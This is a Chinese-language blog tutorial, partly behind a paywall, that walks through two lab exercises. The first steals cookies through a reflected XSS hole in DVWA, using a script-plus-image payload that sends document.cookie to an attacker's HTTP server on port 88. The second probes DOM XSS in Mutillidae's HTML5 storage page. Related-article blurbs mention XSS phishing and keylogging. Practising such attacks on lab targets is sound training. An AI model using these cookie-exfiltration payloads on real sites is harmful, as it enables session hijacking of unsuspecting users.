利用 XSS 获取 Cookie 利用DOM XSS

最新推荐文章于 2025-03-29 09:39:40 发布
最新推荐文章于 2025-03-29 09:39:40 发布
阅读量1.3k 收藏 2
点赞数
文章标签: xss 前端 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71416901/article/details/131327475
版权
本文介绍了如何利用XSS获取Cookie,通过在Kali Linux上开启HTTP服务,登录靶机并利用XSS反射漏洞。同时,讲解了DOM XSS的利用,展示了如何在浏览器的本地存储中注入HTML代码触发DOM XSS。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

利用 XSS 获取 Cookie:

一、打开终端

1.可以从 Kali Linux界面打开终端 

​编辑 

2.启动owasp靶机

二、利用 XSS 获取 Cookie案例

 1.在 Kali Linux 的终端上运行以下命令来开启 HTTP 服务:python -m http.server 88(打开服务器)

 2.使用 admin作为账号和密码,登录DWVA,并转到XSS reflection:

2.1登录DWAV,先点击Damn Vulnerable Web Application

 2.2登录页面,admin作为账号和密码

3.3 转到XSS reflection

3. 在文本框中输入以下内容(___处填上 Kali 主机 IP 地址):

 4.查看终端,你会发现出现以下信息:

利用DOM XSS 

一、启动owasp靶机环境

1.登录owasp靶机

 2.浏览器登入靶机IP,转到 Mutillidae II | OWASP 2013 | XSS | DOM | HTML5 Storage

 ​编辑

 二、利用DOM XSS案例

1.这个练习会展示一个表单,用于在浏览器的本地记录中存储信息和相应的

session。然后在“网络”选项卡中启用开发人员工具。

2.尝试添加一些数据,发现在开发者工具中并没有进行网络通信,绿色条显示

是输入的值:

cookbook test2

3. 如果检查"Add New"按钮,看到它在单击时调用了一个函数 addItemToStorage:

Add New

4.现在,转到 Debugger 选项卡并查找 addItemToStorage 函数, 在 index.php 的第1064 行找到了这个函数: ​编辑

 5.尝试设置一个包含 HTML 代码的键值。添加以下键作为键的新值:

Cookbook test

3

 6.如果浏览器解释 HTML 代码,则很可能也会出现 JavaScript 块。添加一个新

条目,其中包含以下键值:

利用 XSS 获取 Cookie

如果目标站点存在 XSS 漏洞并且 Cookie 并没有开启 http-only 的话,那么它们二者将是 Web 安全的巨大隐患。利用 XSS 攻击 Cookie 是一定需要一个服务器的,下面我们一起学习如何使用 XSS 来获取用户的 cookie。

一、打开终端

1.可以从 Kali Linux界面打开终端 

 

2.启动owasp靶机

二、利用 XSS 获取 Cookie案例

 1.在 Kali Linux 的终端上运行以下命令来开启 HTTP 服务:python -m http.server 88(打开服务器)

 2.使用 admin作为账号和密码,登录DWVA,并转到XSS reflection:

2.1登录DWAV,先点击Damn Vulnerable Web Application

 2.2登录页面,admin作为账号和密码

3.3 转到XSS reflection

3. 在文本框中输入以下内容(___处填上 Kali 主机 IP 地址):

Bob<script>document.write('<img  src="http://___:88/'+document.cookie+'">');</script> 

(使用img图片标签,在图片地址src写入了获取cookie的指令,由于无法从src获取到图片,就会报错,报错信息中包含Cookie)

192.168.17.131

最低0.47元/天 解锁文章
XSS获取Cookie实验
zj2084的博客
03-19 1573
攻击者服务器:192.168.112.183,将获取Cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。正常Web服务器:192.168.112.188,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。用户浏览器:192.168.112.1,Windows环境,使用Chrome浏览器。攻击者浏览器:192.168.112.1,Windows环境,使用Firefox浏览器。
XSS-窃取Cookie及拓展
2301_76631050的博客
07-23 1950
步骤一:来到xss平台 点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
【网络安全渗透测试零基础入门】之XSS攻击获取用户cookie和用户密码(实战演示)
最新发布
Cairo_A的博客
03-29 604
该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!
简单的利用XSS获取用户cookie
shy的博客
10-25 4561
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
使用XSS漏洞获取cookies
Decaede的博客
01-26 1587
使用XSS漏洞获取cookies
XSS平台与cookie获取
永远是少年
11-21 1333
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台与cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 2562
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
反射型XSS,存储型XSSDomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3189
XSS: 反射型XSS,存储型XSSDomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储型>反射型>D...
DOMXSS;cookie获取XSS后台使用;XSS钓鱼演示;XSS获取键盘记录实验演示
qq_44696653的博客
04-21 2356
DOMXSS DOM简介(摘录) 通过JavaScript,可以重构整个HTML文档,可以添加、移除、改变或重排页面上的项目。 要改变页面的某个东西,JavaScript就需要获得对HTML文档中所有元素进行添加、移动、改变或移除的方法和属性,都是通过文档对象模型来获得的(DOM)。 所以就可以将DOM理解为访问HTML的标准编程接口。 DOMXSS漏洞演示 ...
XSSCookie漏洞验证
02-19
Cookie漏洞则是指攻击者利用网站对Cookie处理的不当,窃取、篡改用户的Cookie信息,从而获得用户的身份认证、个人数据等敏感信息。 在XSS攻击中,根据其攻击效果的不同,可以分为三种类型:反射型XSS、存储型XSS和...
ctf xss利用_利用存储型XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1775
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS获取cookie利用方式 (ASP版).txt
12-22
XSS获取cookie利用方式简单方法
xss获取cookie
kiihuang的博客
03-31 970
主要是借助存储型xss漏洞,来进行攻击的,获取每个访问人的cookie
3-5通过XSS获取cookie以及XSS后台管理系统的使用
山兔的博客
04-23 4012
XSS漏洞测试:cookie获取和钓鱼攻击演示  XSS漏洞测试:cookie的窃取和利用 同时讲到get型xss利用,post型xss利用XSS漏洞测试:钓鱼攻击  XSS漏洞测试:xss获取用户键盘记录 让大家更好的理解xss的危害以及原理 案例1:xss如何获取cookie? GET型XSS利用cookie获取 pkxss管理后台使用介绍 在源码包里面,有一个pkxss,我们可以把这个目录,单独的放在某个目录下面,这个东西其实是一个可以独立使用的后台,我们可以单独的把他放在站点目录下
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 2053
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 1320
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
XSS获取cookie
qq_40273198的博客
11-21 4753
   DVWA XSS获取cookie 反射型 一、LOW 1.被害者已经登录http://127.0.0.1/DVWA/vulnerabilities/xss_r/ 网站,该网站存在xss漏洞。 网站源代码如下:未进行任何过滤 &lt;?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key...
XSS平台获取cookie
qq_41048303的博客
02-19 3768
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值